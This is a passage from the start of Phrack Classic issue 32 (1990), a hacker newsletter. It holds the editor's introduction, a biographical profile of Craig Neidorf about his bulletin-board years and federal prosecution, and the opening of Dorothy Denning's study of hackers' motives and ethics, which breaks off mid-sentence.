Phrack Classic Volume Three, Issue 32, File #1 of XX Phrack Classic Newsletter Issue XXXII
==Phrack Classic==
Volume Three, Issue 32, File #1 of XX
Phrack Classic Newsletter Issue XXXII Index
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
November 17, 1990
Over the past year we have seen MANY changes in the Phreak/Hack community.
We felt the heat of Operation Sun Devil, watched are friends become public
scapegoats of the 'hacker world', and watched in anger as the lawyers have
tried to smash us and put us out like an old cigarette. Almost everyday I
hear about someone who just got 'busted' for one reason or another. This
makes me sit back and think. If people go to jail for hacking, and hackers
know this, then why does it continue? Ahhh... an unsolved mystery. Maybe I
should call Time Life Books. No, I don't think so.
Anyways, I am pleased to announce a new era in electronic publications. A
new age for a new age. Ladies and gentleman (Trumpet Fanfare Added Here),
Phrack Classic. Phrack Classic takes off where Phrack left off. For those
of you who have read Phrack then you might remember me as the editor for a
while. Well, now I am doing Phrack Classic to try to release a newsletter
that really describes what the Phreak/Hack world is like here in the 1990's.
People ask me why I am writing a hacker magazine, and they look down on me
for my attempt. I feel Phrack Classic is written for hackers, yes, but I also
feel that a hacker is one "who enjoys pushing the envelope, bypassing limits,
discovering knowledge, inventing solutions, adventuring into uncharted
areas." So is it so wrong to publish a newsletter for the exchange of free
information? No, I don't think so.
Anyone is welcome to submit an article for Phrack Classic, and I encourage
everyone to do so. I hope you enjoy this issue and I look forward to bringing
you many more in the not so distant future. Stay safe and be free. See you
at Ho Ho Con!
Crimson Death
Editor of Phrack Classic
(Quote taken from the Hackers 6.0 Conference Brochure)
If you have a question, an article submission, or you just wanna say
hello. Send mail to Crimson Death and Doc Holiday at:
pc@well.uucp
_______________________________________________________________________________
Table of Contents:
1. Phrack Classic XXXII Index by Crimson Death
2. Phrack Classic Spotlight featuring Knight Lightning by Crimson Death
3. Concerning Hackers Who Break Into Computer Systems by Dorthy Denning
4. The Art of Investigation by Butler
5. Unix 'Nasties' by Sir Hackalot
6. Automatic Teller Machine Cards by Jester Sluggo
7. A Trip to the NCSC by Knight Lightning
8. Inside the SYSUAF.DAT File by Pain Hertz
9. RSTS by Crimson Death
10-12. Knight Line I/Parts 1-3 by Doc Holiday
_______________________________________________________________________________
==Phrack Classic==
Volume Three, Issue 32, File #2 of 12
==Phrack Classic Spotlight==
Knight Lightning
~~~~~~~~~~~~~~~~
Personal
~~~~~~~
Handle: Knight Lightning
Call him: Craig Neidorf
Past handles: None
Handle origin: Cross between character "Lightning Lad" from DC Comics'
Legion of Superheros and Michael Knight from the NBC
television series "Knight Rider".
Date of Birth: I doubt you're sending me a birthday card so skip it.
Age at current date: 21 years old
Height: 5'10" or so (give or take an inch)
Weight: 135-140 lbs.
Eye color: Brown
Hair Color: Dark Brown
Computers: Apple IIc (Do you believe this?)
Co-Sysop of: Metal Shop Private, The Brewery, Quick Shop/Metal Shop
AE, Whackoland, The Dark Tower, Digital ITS (yay!),
Stronghold East and probably a few more I've forgotten
about.
Net address: C483307@UMCVMB.MISSOURI.EDU (Yes, they actually gave
C483307@UMCVMB.BITNET me my account back!)
knight@well.sf.ca.us
------------------------------------------------------------------------------
For several years I had been a die hard fan of video games, both arcade
and home versions. It was really the Atari 2600 video game Adventure that led
me into the world of computers and hacking. As many people might know there
was a secret locked within this game concerning a "magic" dot. It was not
mentioned in any instruction manuals for the game, but if you could find it and
bring it to the right place in the game, you could enter a room that didn't
officially exist. In this room was a message flashing in gold and black. It
said "Created by Warren Robinet". From that point on I experimented with every
Atari cartridge I had. I tried screwing around with the connections, the
components on the system itself, and I attempted bizarre tactics within the
games, just to see what might happen. During that period of time I found
several more secretly implanted messages and developed new ways of playing the
games. Atari played on this idea quite a bit when they created a four game
saga called Swordquest, but by then the fun was taken out of it because you
knew already that something was waiting to be found. Eventually I upgraded to
ColecoVision, but before too long this bored me as well. It is sort of
interesting to see the new surge of home videogames of Nintendo, NEC, and Sega.
It makes me wonder if this cycle is permanent.
I was first introduced to the world of computers by a friend who had a
Commodore 64. He showed me what bulletin boards were and then took me on a
tour of the ARPAnet. Later that year, my long-time and best friend, known to
most of you as Taran King obtained the use of his father's IBM PC. Together we
explored various bulletin boards in the St. Louis area, always looking for new
places to visit.
In August of 1983 I received an Apple IIc as a birthday gift from my
parents. It was real basic -- no monitor (I had a black and white television
for that), no extra disk drive, no printer, no joystick, and no modem. Those
items I would have to earn. So instead of playing with faraway computer
systems, I was introduced to programming and a community of people who
considered themselves to be software pirates. These people seemed to be able
to get software before the companies even began to sell it. However, I was
content to play games like Ultima III and Wizardry and hack the game itself by
altering character values. This enabled me to move my characters through
different places, some of which I never might have realized existed. Later, I
was able to redesign the game itself to create an endless world of new
possibilities for intellectual stimulation.
Finally in March of 1984, my parents purchased me a modem. It was a sad
little piece of plastic made by Volksmodem, 300 baud and battery operated, but
it worked and now Knight Lightning was ready to take to the wires. By this
time I already knew a lot about the bulletin board community through Taran
King. Even so, it was relatively odd how fast I became co-sysop of the
ancestor to Metal Shop known as The Dark Tower. TDT was operated by a "hacker"
with the truly unoriginal name of David Lightman. Before I knew it, I was in
remote command of his system with full power over user validation and BBS
maintenance. Although the system went down after about six months, it did
attract a few out of state users and it was here that my notoriety began. It
was almost funny, but even as early as then Taran King, Forest Ranger, and I
became known as the top hacker/phreakers in the St. Louis area. To this day I
still don't understand why.
By July of 1985 most of the hacker bulletin boards in St. Louis had
disappeared, but The Dark Tower program lived again when Taran King created
Metal Shop: The Dark Tower Phase II. He took the name from a popular
afternoon rock'n roll program (KSHE FM radio) that centered on heavy metal.
Both of us had visited systems around the country and we were able to
effectively advertise MS. At one point we had over 500 registered users so we
switched to a general password system for security reasons and eventually in
January of 1986 the board became Metal Shop Private and we cut 4/5ths of the
users.
During the late Spring and early Summer of 1985 Taran King and I created
the 2600 Club. It was just a group name to stick behind our handles since
everybody was doing it, but it only took use a few months to realize just
how ignorant hacker groups really are. However, the 2600 Club had one
great legacy -- it gave birth to Phrack. If you go back and look, you'll
notice that the first issue of Phrack was a product of the 2600 Club. The idea
for doing Phrack came from Forest Ranger. Taran King provided the arena and
would be the editor and I came up with the name.
When I used to call bulletin boards like the Twilight Zone (sysoped by The
Marauder) I would data capture the message bases and save them in text files.
The messages from the hacking subboard would be saved in a file called HACKMESS
(which stood for hack messages), the messages from the phone phreak subboard
were saved as PHREAKMESS, but when there was a subboard where both these types
of messages appeared together, I simply merged the two names and came up with
PHRACKMESS. Since the newsletter would contain information on both topics and
more, I felt the name Phrack was applicable. So where did the "Inc." come
from? Actually it came from another DC Comics series called Infinity Inc.
Kind of silly now since we never intended to actually incorporate. The first
issue of Phrack was distributed on November 17, 1985.
In Phrack issue 2 I began the ongoing series of Phrack World News. I
followed every story I could and it was fun. The first issue was sort of lame,
but eventually I learned that PWN was the most popular segment of Phrack. The
greatest thing about PWN was that it was an original concept for a hacker
newsletter -- lots of people had tried to write "how-to files, but no one had
ever tried news before. Who was getting busted? What did they do? How can I
make sure it doesn't happen to me? Lots of the stories were exaggerated or in
the case of Oryan QUEST, fabricated (by QUEST himself).
Outside of Phrack World News I wrote files about Videoconferencing,
Private Branch eXchanges, and a few others here and there. Prior to Phrack
I had released a huge glossary of telecommunications terms and files about the
divestiture of AT&T and its aftermath. Taran King and I also wrote a joke file
about "Real Phreaks" that was echoed by a continuation of that file in the
Phrack parody issue number 13 that was released on April 1, 1987.
Throughout my years I have met many people who call themselves hackers
and/or phone phreaks:
Android Pope - I wonder how married life is treating him.
Aristotle - Sporty! He is the former editor of the New TAP.
Bad Subscript - Right hand man to Control C and an expert at disco dancing
in high speed Camaros.
Bill from RNOC - How have your phone bills been? High? Have they been!?
He is also known as "the most dangerous man in New York."
Beer Wolf - Former sysop of the (Metal Shop) Brewery.
Blue Buccaneer - Lost track of him over the years.
Cat Man - How about a nice Hawaiian Punch?
Cheap Shades - Now a Computer Science graduate of University of
Missouri-Rolla. Former sysop of Metal Shop AE and
QuickShop.
Control C - A man with serious problems right now. Hope you get those
videotapes and best of luck!
Crimson Death - The one in 618 NPA. Very un-original name, but definitely
one of a kind.
Cryptic Fist - Kinda warm for that leather jacket, isn't it? (90 degrees)
Cutthroat - So what McDonalds do *you* work at?
Dan The Operator - An informant for John Maxfield (SummerCon '87).
Data Line - Now a government agent, but hardly a hacker tracker.
David Lightman - The sysop of The Dark Tower in 314 NPA.
The Dictator - Not-so secret agent of Gail Thackeray, the assistant
Arizona state attorney behind Operation Sun-Devil.
In a past life, Dale was the creator of Candid Camera.
What a surprise that was this summer.
Disk Jockey - I thought he was a great guy until he started to backstab
me on Lunitic Labs while I was under indictment.
Doc Holiday (901) - The original!
Dr. Cypher - Knowledgeable person who remains local.
Dr. Forbin - Last seen at SummerCon '89.
Dr. Ripco - Well haven't met him yet, but in a couple of weeks.
Doom Prophet - A friend who seems to have disappeared.
Epsilon - Must have lost my number I guess.
Emmanuel Goldstein - Also known as Eric Corley, the editor of 2600 Magazine.
Erik Bloodaxe - He is a wildcard... totally unpredictable... hacks by the
seat of his pants. Still active, but he'd better not have
a squirt gun next to his bed or he may be sorry.{SS}
Forest Ranger - The man who introduced me to the hacker elite way back
when. Former editor of TeleComputist Newsletter.
Gary Seven - Don't remember much about him. Met him with Lex in Fla.
Hatchet Molly - You know him as Computer Underground Digest's Gordon
Meyer. He used a hacker alias to better enable him to
write his famous thesis.
Jester Sluggo - A mystery man who is still a legend in the Zantigo
restroom and a better than average drunk driver.
Kleptic Wizard - Was he BJ or the Bear?
Lex Luthor - One time great legend of LOD, now secret BellSouth
Security (at least until I hear otherwise).
The Leftist - I wonder what he was going to say about me at my trial.
He gave me a nod the day they dropped the charges against
me. The US Attorney's office tells me that he was going
to claim he learned all he knew about hacking from reading
Phrack.
Loki - Lost track of him over the years.
Lucifer 666 - Lights, Camera, Action!
The Mad Hacker - Sysop of The Private Connection in 219 NPA.
Mad Hatter - Still don't know what to make of him, but I wonder if he
still thinks table salt and baking soda are cocaine.
The Mentor - Author of GURPS CyberPunk and former sysop of The Phoenix
Project bulletin board.
The Noid - Important enough for Southwestern Bell to question me
about him so important enough to be mentioned here.
Par - Hans.
Phantom Phreaker - A friend.
Phil Phree - Sort of spaced out character and right hand man to The
Ur-vile.
Phrozen Ghost - Lost track of him.
Predat0r - Anarchistic editor of the New TAP.
The Prophet - Didn't actually "meet" him, but I did see him and hear him
speak... as a witness for the prosecution at my trial. I
don't hold a grudge. His testimony helped clear me.
Rabbit - Franz.
The Renegade - Thinks he is part of the Illuminati.
Reverend Enge - Not that religious.
Sir Francis Drake - A great guy with an odd taste in jewelry. The editor of
the now defunct WORM. Duck!
Sir William - Never did hear the whole story of his problems with the
University of Michigan computing staff.
Surfer Bob - Lost track of him, but he enjoyed a tan at SummerCon'88.
Synthetic Slug - Surfs up!
Taran King - My best friend of over 11 years.
TWCB Inc. - Two brothers who attempted to resurrect TAP, but failed.
Tuc - Hey! He's TUC!
The Ur-Vile - Don't know how I feel about him. He needs a real handle.
Some of the memorable bulletin boards I was on include:
Alliance - By Phantom Phreaker
Brainstorm Elite - Where I met Phantom Phreaker and recruited him to Metal
Shop Private.
Broadway Show - By Broadway Hacker. Changed its name to The Radio
Station.
Catch-22 - By Silver Spy. Only 22 users on this system.
Chamas - By Terra (Chaos Computer Club) in Germany.
Dark Tower - By David Lightman 314
Digital ITS - By Oryan QUEST. BBS Commands were in Spanish.
DUNE - Secret system imbedded on the Dartmouth University
mainframe operated remotely by Apollo Phoebus.
Flying Circus - By Monty Python
FreeWorld II - By Major Havoc
Hell Phrozen Over - By the original Crimson Death. Inspiration for the
first Phrack Pro-Phile.
Intergalactic Dismantling, Inc. - By Aiken Drum
Lost City of Atlantis - By The Lineman
Lunatic Labs UnLtd. - By The Mad Alchemist. Great system!
Matrix - By Dr. Stangelove
Metal Shop AE - By Cheap Shades when he lived in St. Louis, Missouri.
Metal Shop Brewery - By Beer Wolf who now denies that it ever happened.
Metal Shop Private - Greatest bulletin board of all time.
MetroMedia - By Dr. Doom. System became Danger Zone Private.
NetSys - By Terminus. NetSys is now in possession of US Secret
Service and Terminus' life is in a shambles. They set
him up and shut him down. You know him as Len Rose.
Pearly Gates - First real out of state bulletin board that I called.
It had a secret section of the board for all of the
really good information. It was operated by Simon
Templar.
Phoenix Project - By The Mentor. Great center of learning.
Phreak Klass 2600 - By The Egyptian Lover. Preceded The Phoenix Project as
a great center of learning.
Pipeline - Another early bbs I visited.
Pirate-80 - A codes board run by Scan Man that has been up for
almost 10 years. This system was NOT a target in
Operation Sun-Devil. Odd?
Private Connection - By The Mad Hacker
Private Sector - Legendary system.
QuickShop - By Cheap Shades when he lived in Rolla, Missouri.
RACS III - By Tuc
Radio Station - See The Broadway Show.
Ripco - By Dr. Ripco - Shut down in Operation Sun-Devil, but
its back up now.
Septic Tank - By The Safecracker. Second generation of The Twilight
Zone.
ShadowSpawn - By Psychic Warlord. Great debate about the use of
handles and real name/telephone/etc. "We're Not
*ELITE*, We're Just Cool As Hell!" Taran King thought
they were elite in the negative sense of the word.
Great system though.
Speed Demon Elite - By The Radical Rocker and home base to MetaliBashers,
Inc.
Stronghold East Elite - The "real" sysop was Slave Driver, but the board was
run from the home of The Equalizer.
Twilight Zone - By The Marauder. Great system for knowledge from my
early days.
Zyolog - By Byte Rider in Hawaii.
There are probably a few others that I have forgotten to mention. My
greatest computer learning experiences came from people like Bill From RNOC,
RNOC, Phantom Phreaker, Forest Ranger, and the authors of the multitude of
Phrack files and other technical journals.
In general I see computers as the communications medium of the 21st
Century so I devoted a lot of time to mastering their use. I do not advocate
the illegal breaking in to computer systems, but there are certain types of
information that I feel should be available to everyone equally and not just
the rich or the well connected.
Through my experiences on the Internet, I have had legitimate access to
IBM VM/CMS, Unix, and VAX/VMS systems. For the most part I am content with my
VM/CMS account, but will accept invitations from system managers to join their
systems as well.
With Forest Ranger and Taran King, I organized and attended SummerCon '87,
SummerCon '88, and SummerCon '89. I did not attend SummerCon '90 since I was
in Chicago at the time. I helped in organizing and attended PartyCon '87 and
most recently I appeared and spoke at the 13th Annual National Computer
Security Conference in Washington D.C.
I had been a part of TeleComputist Newsletter, which inadvertently led to
my first real media appearance (Detroit Free Press) and prior to that I was
helping TWCB Inc. to create a NEW TAP. However, when I learned that they were
just pulling a fraud, I exposed them. For 5 years I devoted myself to Phrack
with absolutely no compensation save knowledge and experiences gained.
===============================================================================
Interests: Racquetball (varsity team in high school and a bookshelf full
of trophies), Telecommunications, Computers, Music (classic
rock and pop music... NO RAP!), Fraternity life (well at least
up until the trustees suspended me for being indicted), Women
(sexy and smart over just good looks any day), Driving at warp
speed on the interstate.
Craig's Favorite Things
-----------------------
Women: I've got it, but don't flaunt it.
Cars: Ford Mustang, Eagle Talon, Nissan 300 ZX, and Porsche *911* Carrera!
Foods: No Curry in a hurry-Blecch! American, Italian, Mexican, and Chinese!
Music: Genesis, Rush, Yes, Chicago, Eagles, Def Leppard, The Police, Styx...
Leisure: Sleeping, working out, racquetball, writing, computing.
Alcohol: Bacardi, Smirnoff, Jack Daniels, Pat O'Briens, Hard Rock Cafe.
Most Memorable Experiences
--------------------------
All of the SummerCons, having an assistant U.S. Attorney lie to my face and
tell me I wasn't in trouble five days after he went to the grand jury to have
me indicted, football game with Sluggo in the Zantigo parking lot, road trip to
Chicago for PartyCon '87, my time in a St. Louis Federal holding facility
after I turned myself over to the U.S. Federal Marshalls (E911 Incident),
Taran King and Cheap Shades out of jail when they were caught trashing,
summer Alliance teleconferences with the PhoneLine Phantoms, the first time I
heard Frank & The Funny Phone Call, watching Control C bother some girl
in the airport and then seeing Erik Bloodaxe fall in love with her.
Some Other People To Mention
----------------------------
Sheldon Zenner - The greatest attorney practicing today. He turned
everything around and saved my future from a legal system
gone awry. Thanks also to Kliebard, Dunlop, Berkowitz,
and Kaufman.
John Perry Barlow - Lyricist for the Grateful Dead and amazing writer, John
also participated a great deal in generating publicity
about my case and helped found the Electronic Frontier
Foundation.
Dr. Dorothy Denning - A lady who not only helped with my defense, but invited
me to the 13th Annual National Computer Security
Conference and is a good friend.
Peter Denning - Senior editor of the Communications of the ACM and an
interesting fellow in his own right.
Scott Ellentuch - Mentioned earlier as Tuc, Scott is the president of the
Telecom Computer Security Group and a close friend. Tuc
assisted the defense team by locating the Bellcore public
catalog and the 911 documents found within. Thanks Tuc!
Terry Gross - Attorney with Rabinowitz & Boundin in New York City who
was hired by the EFF to work on court motions dealing
with the First Amendment.
Mike Godwin - Don't know Mike very well yet, but he was very outspoken
in Computer Underground Digest while I was under
indictment and now he is in-house counsel to the
Electronic Frontier Foundation.
Katie Hafner - Author of a book coming soon about Pengo, Kevin Mitnick,
and Robert Morris, Jr. I met Katie at the NCSConference.
Steve Jackson - Founder of Steve Jackson Games. I haven't yet had the
pleasure of meeting Steve, but we may be running into
each other in the near future.
Mitch Kapor - Industry wizard and creator of the Lotus 1-2-3 program,
Mitch is a founding member of the Electronic Frontier
Foundation that provided legal assistance in my case. I
hope to meet him face-to-face in the near future.
Gordon Meyer - Gordon has been a tremendous help with Phrack and a
friend throughout my entire trial ordeal.
John Nagle - Inventor who gave technical assistance to my defense team
and located some very important public documents.
Marc Rotenberg - Director of the Computer Professionals For Social
Responsibility in Washington D.C. CPSR is an
organization lobbying Congress for reforms in the
Computer Fraud & Abuse Act and other legislation. I hope
to be working with him in the future.
Jim Thomas - Creator and editor of Computer Underground Digest, he
brought the details and evidence in my trial to the
public eye which helped me gain support.
Steve Wozniak - Never had any contact with him, but since he had a hand
in EFF, I thought I would mention him. Incidentally I'm
ready to upgrade computers if someone has a Macintosh on
hand.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
David Lightman - The one in 214. See Oryan QUEST.
Magic Hasan - Totally freaked out when I contacted him this semester. It
was like he thought I had the plague or something.
Olorin The White - He couldn't seem to understand that I did not want to join
his group.
Oryan QUEST - A hacker who made up news for PWN just to boost his
reputation. Unleash with full force on this!
Sally Ride - Also known as Space Cadet, SR co-wrote one of the most
interesting PWN articles ever printed.
===============================================================================
Private Jokes
~~~~~~~~~~~~
There are far too many to go through and most of them have been previously
written by Taran King in a Phrack Prophile that appeared in issue 20 of Phrack.
My private jokes shall remain private between those involved or at least until
I publish a book covering the topic.
===============================================================================
Phrack is a part of my life that is now over. I hope that Phrack Classic
which appears to be a second generation Phrack will learn from its predecessor
and not allow any articles that advocate the illegal entry into computer
systems. On the other hand, I hope they will continue to bring interesting
information and news to light every issue.
For the record, I am not the editor of Phrack Classic. In fact I am not
even a part of their staff. I would ask that no one send me any articles for
that publication because they will not be forwarded. I take no responsibility
for the actions taken by Phrack Classic, but I have faith that they shall stay
on the path of honesty and integrity.
I also have a few words to say about some other issues. My case and
prosecution had absolutely nothing to do with Operation Sun-Devil, with a
possible exception being the secret video-taping done by the United States
Secret Service at the Ramada Inn-Westport (Maryland Heights, Missouri) during
July 22-24, 1988 (i.e., SummerCon '88). Operation Sun-Devil was an attempt to
crack down on credit card and calling card abusers and NOT hackers. Yes, there
are some hackers that abuse these items, but the mere abuse of such does not
make someone a hacker and it is about time that mainstream reporters,
government agents, and prosecutors began to understand the difference.
I feel that the abuse of "cards" is very immature and should be met with
stern punishment. I myself have been the victim of credit card fraud and I can
tell you that it is not pleasant to open your bill and see expensive charges
from QVC Home Shopping Network. For the younger readers, it may take them a
few years to understand this... perhaps when they have credit cards and bills
of their own to deal with.
As you may guess there is MUCH MORE to my story especially concerning the
last 10 issues of Phrack, the Internet, and the E911 incident, but now is not
the time or the place to tell it. Sometime in the future I hope to assemble
the tales of all my adventures in the computer underground and publish them in
a real book.
Finally, Hackers are *NOT* criminals! Quoting from the brochure for this
year's Hackers Conference in Saratoga, California, a Hacker is "someone who
enjoys pushing the envelope, bypassing limits, discovering knowledge, inventing
solutions, adventuring into uncharted areas."
:Craig Neidorf
===============================================================================
...And now for the regularly taken poll from all interviewees.
Of the general population of phreaks you have met, would you consider most
phreaks, if any, to be computer geeks?
"I would not consider most of the hackers or phone phreaks I have met to
be computer geeks, however over the years I have run into people whose goal in
life is to pirate every piece of software in existence and of those people I
feel that a strong percentage are 'geeks'."
Thanks for your time, Craig. "No problem."
Crimson Death
_______________________________________________________________________________
==Phrack Classic==
Volume Three, Issue 32, File #3 of 12
Concerning Hackers Who Break into Computer Systems
Dorothy E. Denning
Digital Equipment Corp., Systems Research Center
130 Lytton Ave., Palo Alto, CA 94301
415-853-2252, denning@src.dec.com
Abstract
A diffuse group of people, often called ``hackers,'' has been
characterized as unethical, irresponsible, and a serious danger to
society for actions related to breaking into computer systems. This
paper attempts to construct a picture of hackers, their concerns,
and the discourse in which hacking takes place. My initial findings
suggest that hackers are learners and explorers who want to help
rather than cause damage, and who often have very high standards
of behavior. My findings also suggest that the discourse surrounding
hacking belongs at the very least to the gray areas between larger
conflicts that we are experiencing at every level of society and
business in an information age where many are not computer literate.
These conflicts are between the idea that information cannot be owned
and the idea that it can, and between law enforcement and the First
and Fourth Amendments. Hackers have raised serious issues about
values and practices in an information society. Based on my findings,
I recommend that we work closely with hackers, and suggest several
actions that might be taken.
1. Introduction
The world is crisscrossed with many different networks that are used
to deliver essential services and basic necessities -- electric power,
water, fuel, food, goods, to name a few. These networks are all
publicly accessible and hence vulnerable to attacks, and yet virtually
no attacks or disruptions actually occur.
The world of computer networking seems to be an anomaly in the
firmament of networks. Stories about attacks, breakins, disruptions,
theft of information, modification of files, and the like appear
frequently in the newspapers. A diffuse group called ``hackers''
is often the target of scorn and blame for these actions. Why are
computer networks any different from other vulnerable public networks?
Is the difference the result of growing pains in a young field?
Or is it the reflection of deeper tensions in our emerging information
society?
There are no easy or immediate answers to these questions. Yet it
is important to our future in a networked, information-dependent
world that we come to grips with them. I am deeply interested in
them. This paper is my report of what I have discovered in the early
stages of what promises to be a longer investigation. I have
concentrated my attention in these early stages on the hackers
themselves. Who are they? What do they say? What motivates them?
What are their values? What do that have to say about public policies
regarding information and computers? What do they have to say about
computer security?
>From such a profile I expect to be able to construct a picture of
the discourses in which hacking takes place. By a discourse I mean
the invisible background of assumptions that transcends individuals
and governs our ways of thinking, speaking, and acting. My initial
findings lead me to conclude that this discourse belongs at the very
least to the gray areas between larger conflicts that we are
experiencing at every level of society and business, the conflict
between the idea that information cannot be owned and the idea that
it can, and the conflict between law enforcement and the First and
Fourth Amendments.
But, enough of the philosophy. On with the story!
2. Opening Moves
In late fall of 1989, Frank Drake (not his real name), editor of
the now defunct cyberpunk magazine W.O.R.M., invited me to be
interviewed for the magazine. In accepting the invitation, I hoped
that something I might say would discourage hackers from breaking
into systems. I was also curious about the hacker culture. This
seemed like a good opportunity to learn about it.
The interview was conducted electronically. I quickly discovered
that I had much more to learn from Drake's questions than to teach.
For example, he asked: ``Is providing computer security for large
databases that collect information on us a real service? How do
you balance the individual's privacy vs. the corporations?'' This
question surprised me. Nothing that I had read about hackers ever
suggested that they might care about privacy. He also asked: ``What
has (the DES) taught us about what the government's (especially NSA's)
role in cryptography should be?'' Again, I was surprised to discover
a concern for the role of the government in computer security. I
did not know at the time that I would later discover considerable
overlap in the issues discussed by hackers and those of other computer
professionals.
I met with Drake to discuss his questions and views. After our
meeting, we continued our dialog electronically with me interviewing
him. This gave me the opportunity to explore his views in greater
depth. Both interviews appear in ``Computers Under Attack,''
edited by Peter Denning (DenningP90).
My dialog with Drake increased my curiosity about hackers. I read
articles and books by or about hackers. In addition, I had discussions
with nine hackers whom I will not mention by name. Their ages ranged
from 17 to 28.
The word ``hacker'' has taken on many different meanings ranging
from 1) ``a person who enjoys learning the details of computer systems
and how to stretch their capabilities'' to 2) ``a malicious or
inquisitive meddler who tries to discover information by poking around
... possibly by deceptive or illegal means ...'' (Steele83). The
hackers described in this paper are both learners and explorers who
sometimes perform illegal actions. However, all of the hackers I
spoke with said they did not engage in or approve of malicious acts
that damage systems or files. Thus, this paper is not about malicious
hackers. Indeed, my research so far suggests that there are very
few malicious hackers. Neither is this paper about career criminals
who, for example, defraud businesses, or about people who use stolen
credit cards to purchase goods. The characteristics of many of the
hackers I am writing about are summed up in the words of one of the
hackers: ``A hacker is someone who experiments with systems...
(Hacking) is playing with systems and making them do what they were
never intended to do. Breaking in and making free calls is just
a small part of that. Hacking is also about freedom of speech and
free access to information -- being able to find out anything. There
is also the David and Goliath side of it, the underdog vs. the system,
and the ethic of being a folk hero, albeit a minor one.''
Richard Stallman, founder of the Free Software Foundation who calls
himself a hacker according to the first sense of the word above,
recommends calling security-breaking hackers ``crackers''
(Stallman84). While this description may be more accurate, I shall
use the term ``hacker'' since the people I am writing about call
themselves hackers and all are interested in learning about computer
and communication systems. However, there are many people like
Stallman who call themselves hackers and do not engage in illegal
or deceptive practices; this paper is also not about those hackers.
In what follows I will report on what I have learned about hackers
from hackers. I will organize the discussion around the principal
domains of concerns I observed. I recommend Meyer's thesis (Meyer89)
for a more detailed treatment of the hackers' social culture and
networks, and Meyer and Thomas (MeyerThomas90) for an interesting
interpretation of the computer underground as a postmodernist rejection
of conventional culture that substitutes ``rational technological
control of the present for an anarchic and playful future.''
I do not pretend to know all the concerns that hackers have, nor
do I claim to have conducted a scientific study. Rather, I hope
that my own informal study motivates others to explore the area
further. It is essential that we as computer security professionals
take into account hackers' concerns in the design of our policies,
procedures, laws regulating computer and information access, and
educational programs. Although I speak about security-breaking hackers
as a group, their competencies, actions, and views are not all the
same. Thus, it is equally important that our policies and programs
take into account individual differences.
In focusing on what hackers say and do, I do not mean for a moment
to set aside the concerns of the owners and users of systems that
hackers break into, the concerns of law enforcement personnel, or
our own concerns as computer security professionals. But I do
recommend that we work closely with hackers as well as these other
groups to design new approaches and programs for addressing the
concerns of all. Like ham radio operators, hackers exist, and it
is in our best interest that we learn to communicate and work with
them rather than against them.
I will suggest some actions that we might consider taking, and I
invite others to reflect on these and suggest their own. Many of
these suggestions are from the hackers themselves; others came from
the recommendations of the ACM Panel on Hacking (Lee86) and from
colleagues.
I grouped the hackers' concerns into five categories: access to
computers and information for learning; thrill, excitement and
challenge; ethics and avoiding damage; public image and treatment;
and privacy and first amendment rights. These are discussed in
the next five subsections. I have made an effort to present my
findings as uncritical observations. The reader should not infer
that I either approve or disapprove of actions hackers take.
3. Access to Computers and Information for Learning
Although Levy's book ``Hackers'' (Levy84) is not about today's
security-breaking hackers, it articulates and interprets a ``hacker
ethic'' that is shared by many of these hackers. The ethic includes
two key principles that were formulated in the early days of the
AI Lab at MIT: ``Access to computers -- and anything which might
teach you something about the way the world works -- should be
unlimited and total,'' and ``All information should be free.'' In
the context in which these principles were formulated, the computers
of interest were research machines and the information was software
and systems information.
Since Stallman is a leading advocate of open systems and freedom
of information, especially software, I asked him what he means by
this. He said: ``I believe that all generally useful information
should be free. By `free' I am not referring to price, but rather
to the freedom to copy the information and to adapt it to one's own
uses.'' By ``generally useful'' he does not include confidential
information about individuals or credit card information, for example.
He further writes: ``When information is generally useful,
redistributing it makes humanity wealthier no matter who is
distributing and no matter who is receiving.'' Stallman has argued
strongly against user interface copyright, claiming that it does
not serve the users or promote the evolutionary process (Stallman90).
I asked hackers whether all systems should be accessible and all
information should be free. They said that it is OK if some systems
are closed and some information, mainly confidential information
about individuals, is not accessible. They make a distinction between
information about security technology, e.g., the DES, and confidential
information protected by that technology, arguing that it is the
former that should be accessible. They said that information hoarding
is inefficient and slows down evolution of technology. They also
said that more systems should be open so that idle resources are
not wasted. One hacker said that the high costs of communication
hurts the growth of the information economy.
These views of information sharing seem to go back at least as far
as the 17th and 18th centuries. Samuelson (Samuelson89) notes that
``The drafters of the Constitution, educated in the Enlightenment
tradition, shared that era's legacy of faith in the enabling powers
of knowledge for society as well as the individual.'' She writes
that our current copyright laws, which protect the expression of
information, but not the information itself, are based on the belief
that unfettered and widespread dissemination of information promotes
technological progress. (Similarly for patent laws which protect
devices and processes, not the information about them.) She cites
two recent court cases where courts reversed the historical trend
and treated information as ownable property. She raises questions
about whether in entering the Information Age where information is
the source of greatest wealth, we have outgrown the Enlightenment
tradition and are coming to treat information as property.
In a society where knowledge is said to be power, Drake expressed
particular concern about what he sees as a growing information gap
between the rich and poor. He would like to see information that
is not about individuals be made public, although it could still
be owned. He likes to think that companies would actually find it
to their advantage to share information. He noted how IBM's disclosure
of the PC allowed developers to make more products for the computers,
and how Adobe's disclosure of their fonts helped them compete against
the Apple-Microsoft deal. He recognizes that in our current political
framework, it is difficult to make all information public, because
complicated structures have been built on top of an assumption that
certain information will be kept secret. He cites our defense policy,
which is founded on secrecy for military information, as an example.
Hackers say they want access to information and computing and network
resources in order to learn. Both Levy (Levy84) and Landreth
(Landreth89) note that hackers have an intense, compelling interest
in computers and learning, and many go into computers as a profession.
Some hackers break into systems in order to learn more about how
the systems work. Landreth says these hackers want to remain
undiscovered so that they can stay on the system as long as possible.
Some of them devote most of their time to learning how to break the
locks and other security mechanisms on systems; their background
in systems and programming varies considerably. One hacker wrote
``A hacker sees a security hole and takes advantage of it because
it is there, not to destroy information or steal. I think our
activities would be analogous to someone discovering methods of
acquiring information in a library and becoming excited and perhaps
engrossed.''
We should not underestimate the effectiveness of the networks in
which hackers learn their craft. They do research, learn about
systems, work in groups, write, and teach others. One hacker said
that he belongs to a study group with the mission of churning out
files of information and learning as much as possible. Within the
group, people specialize, collaborate on research projects, share
information and news, write articles, and teach others about their
areas of specialization. Hackers have set up a private system of
education that engages them, teaches them to think, and allows them
to apply their knowledge in purposeful, if not always legal,
activity. Ironically, many of our nation's classrooms have been
criticized for providing a poor learning environment that seems to
emphasize memorization rather than thinking and reasoning. One hacker
reported that through volunteer work with a local high school, he
was trying to get students turned on to learning.
Many hackers say that the legitimate computer access they have through
their home and school computers do not meet their needs. One student
told me that his high school did not offer anything beyond elementary
courses in BASIC and PASCAL, and that he was bored by these. Hans
